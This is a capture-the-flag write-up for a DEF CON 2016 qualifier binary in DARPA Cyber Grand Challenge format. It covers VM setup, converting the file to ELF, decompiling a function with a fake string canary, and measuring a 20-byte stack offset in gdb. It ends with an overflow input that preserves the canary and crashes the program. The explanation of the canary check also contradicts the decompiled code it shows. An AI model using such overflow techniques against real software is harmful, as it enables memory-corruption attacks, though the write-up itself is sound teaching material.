List


Information

Description

http://download.quals.shallweplayaga.me/335e35448b30ce7697fbb036cce45e34/easy-prasky.tar.bz2

easy-prasky_335e35448b30ce7697fbb036cce45e34.quals.shallweplayaga.me:10001

File

easy-prasky.tar.bz2

Source Code


Writeup

File information

  • Available to check the information below using File command.

File information
$ tar -jxvf easy-prasky.tar.bz2
$ cd easy-prasky-with-buffalo-on-bing/
$ file easy-prasky-with-buffalo-on-bing 
easy-prasky-with-buffalo-on-bing: data
  • Check out head of file to gain accurate information of file.
  • This file is CGC(Cyber Grand Challenge) format as you can see after checking head of file.
hexdump -C easy-prasky-with-buffalo-on-bing | head
00000000  7f 43 47 43 01 01 01 43  01 4d 65 72 69 6e 6f 00  |.CGC...C.Merino.|
00000010  02 00 03 00 01 00 00 00  b7 86 04 08 34 00 00 00  |............4...|
00000020  80 08 00 00 00 00 00 00  34 00 20 00 03 00 28 00  |........4. ...(.|
00000030  05 00 04 00 06 00 00 00  34 00 00 00 34 80 04 08  |........4...4...|
00000040  34 80 04 08 60 00 00 00  60 00 00 00 04 00 00 00  |4...`...`.......|
00000050  04 00 00 00 01 00 00 00  00 00 00 00 00 80 04 08  |................|
00000060  00 80 04 08 3e 08 00 00  3e 08 00 00 05 00 00 00  |....>...>.......|
00000070  00 10 00 00 01 00 00 00  3e 08 00 00 00 00 00 00  |........>.......|
00000080  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000090  00 10 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|

Cyber Grand Challenge

http://repo.cybergrandchallenge.com/


Binary analysis

Preferences for running cgc files

  • DARPA offers environment to execute CGC file using Vagrant.
VMs
cgc-linux-dev.box	ae1e267b86ac556dac2ed7c6dfc6ffc9370a2134c1a53387c1809e09d21fa27e
vm.json				7f553ee1cf6d16dae7a23bf9738d678042b33a86caf1525a3e8aaf44d4cb12c5 
Vagrantfile			ff0f8b4a3996a137d2a6eb7088a632928068425b9c4502f6c754c3f079672d00
  • Visit the site below, get downloaded and installed file.

Download Vagrant

https://www.vagrantup.com/downloads.html

Vagrant command
$ vagrant up
Bringing machine 'cb' up with 'virtualbox' provider...
Bringing machine 'ids' up with 'virtualbox' provider...
Bringing machine 'pov' up with 'virtualbox' provider...
Bringing machine 'crs' up with 'virtualbox' provider...
Bringing machine 'ti' up with 'virtualbox' provider...
==> cb: Importing base box 'cgc-linux-dev'...
==> cb: Matching MAC address for NAT networking...
==> cb: Checking if box 'cgc-linux-dev' is up to date...
...
==> ti: stdin: is not a tty
==> ti: Running provisioner: file...
==> ti: Running provisioner: shell...
    ti: Running: inline script
==> ti: stdin: is not a tty
$
  • Available to access VM using command as below.(PW : vagrant)
SSH connection
$ ssh vagrant@127.0.0.1 -p 2222
vagrant@127.0.0.1's password: 
Linux cgc-linux-packer 3.13.11-ckt21-cgc #1 SMP Mon Feb 29 16:42:11 UTC 2016 i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
vagrant@cb:~$
  • Send "easy-prasky-with-buffalo-on-bing" file to CGC VM.
Send file to CGC VM.
$ scp -P 2222 easy-prasky-with-buffalo-on-bing vagrant@127.0.0.1:/home/vagrant
vagrant@127.0.0.1's password: 
easy-prasky-with-buffalo-on-bing                                                                                                   100% 2376     2.3KB/s   00:00    
$
  • Available to execute the sent file as below.
./easy-prasky-with-buffalo-on-bing
vagrant@cb:~$ ./easy-prasky-with-buffalo-on-bing 
test    
canary okvagrant@cb:~$

CGC to elf

  • This file is recognized as DATA file in IDA because it is CGC file format as explained earlier.
  • It needs to change file format to analyze this file with IDA Pro.
    • Available to change cgc file format to elf file format using "cgc2elf" offered by "Cyber Grand Challenge".
cgc2elf install
$ sudo dpkg -i cgc2elf_10206-cfe-rc6_i386.deb 
Selecting previously unselected package cgc2elf.
(Reading database ... 209320 files and directories currently installed.)
Preparing to unpack cgc2elf_10206-cfe-rc6_i386.deb ...
Unpacking cgc2elf (10206-cfe-rc6) ...
Setting up cgc2elf (10206-cfe-rc6) ...
Processing triggers for man-db (2.6.7.1-1ubuntu1) ...
$

CGC Packages

http://repo.cybergrandchallenge.com/deb/

  • Changed cgc file format to elf file format using "cgc2elf" as below.
cgc2elf easy-prasky-with-buffalo-on-bing
$ file easy-prasky-with-buffalo-on-bing 
easy-prasky-with-buffalo-on-bing: data
$ cgc2elf easy-prasky-with-buffalo-on-bing 
$ file easy-prasky-with-buffalo-on-bing 
easy-prasky-with-buffalo-on-bing: ELF 32-bit LSB  executable, Intel 80386, version 1 (SYSV), statically linked, stripped
$ checksec.sh --file easy-prasky-with-buffalo-on-bing_CGC 
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      FILE
No RELRO        No canary found   NX enabled    No PIE          No RPATH   No RUNPATH   easy-prasky-with-buffalo-on-bing_CGC
$

sub_8048370()

  • The function performs as below.
    • It stores the string "lddwDrwhkTEBSya_" in Canary.
    • It stores the input value by user in "userInputStr".
      • This function takes a value using scanf ().
      • The input value is available to overwrite the saved value in Canary.
    • It checks out if the stored value in Canary and "lddw" are same using strncmp() function.
      • It outputs "canary ok" if there is a string "lddw" in canary variable.
      • It outputs "hacking detected, see ya" if there isn't a string "lddw" in canary variable.
sub_8048370()
int sub_8048370()
{
  char userInputStr; // [esp+2Fh] [ebp-29h]@1
  char Canary; // [esp+43h] [ebp-15h]@1

  strncpy(&Canary, "lddwDrwhkTEBSya_", 17);
  scanf((int)&userInputStr);
  if ( !strncmp((int)&Canary, (int)"lddwDrwhkTEBSya_", 4) )
  {
    printf((int)"hacking detected, see ya");
    exit(-1);
  }
  return printf((int)"canary ok");
}

Structure of Exploit code 

  1. The input value by user brings out a segment fault bypassing Canary.

The following information is required for an attack:

  • Check memory structure.("userInputStr"、"canary")

Information for attack

Check memory structure

  • Set Break point as follows.

    • 0x804839d : strncpy()

    • 0x80483a8 : scanf()

Break point
(gdb) b *0x8048000 + 0x39d
Breakpoint 1 at 0x804839d
(gdb) b *0x8048000 + 0x3a8
Breakpoint 2 at 0x80483a8
  • The string "lddwDrwhkTEBSya_" was stored in canary area (0xbffff6c3) by strncpy () function. 
strncpy()
(gdb) r
Starting program: /home/lazenca0x0/Documents/DEFCON 2016/easy-prasky-with-buffalo-on-bing 

Breakpoint 1, 0x0804839d in ?? ()
(gdb) x/wx $esp
0xbffff680:	0xbffff6c3
(gdb) x/wx 0xbffff6c3
0xbffff6c3:	0x00000000
(gdb) c
Continuing.

Breakpoint 2, 0x080483a8 in ?? ()
(gdb) x/wx 0xbffff6c3
0xbffff6c3:	0x7764646c
(gdb) x/s 0xbffff6c3
0xbffff6c3:	"lddwDrwhkTEBSya_"

  • The address of userInputStr is 0xbffff6af, and the address of canary is 0xbffff6c3.

    • 0xbffff6c3-0xbffff6af=0x14(20 byte)
    • Thus, you can overwrite the value in canary area with the user input value.
(gdb) x/wx $esp
0xbffff680:	0xbffff6af
(gdb) x/20wx 0xbffff6af
0xbffff6af:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffff6bf:	0x00000000	0x7764646c	0x68777244	0x4245546b
0xbffff6cf:	0x5f617953	0x00000000	0xfff6e800	0x048432bf
0xbffff6df:	0x00000008	0x00000000	0x00000000	0x0486c100
0xbffff6ef:	0x00000108	0xfff81a00	0x000000bf	0xfff86100
(gdb)

Key information

  1. Memory of "userInputStr" variable Address: 0xbffff6af
  2. Memory of "canary" variable Address: 0xbffff6c3
  3. "UserInputStr" variable and "canary" variable offset: 20 bytes

Exploit Code

Exploit code
vagrant@cb:~$ ./easy-prasky-with-buffalo-on-bing_CGC 
AAAAAAAAAAAAAAAAAAAAlddwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
canary okSegmentation fault (core dumped)
vagrant@cb:~$

Flag

Flag


Related Site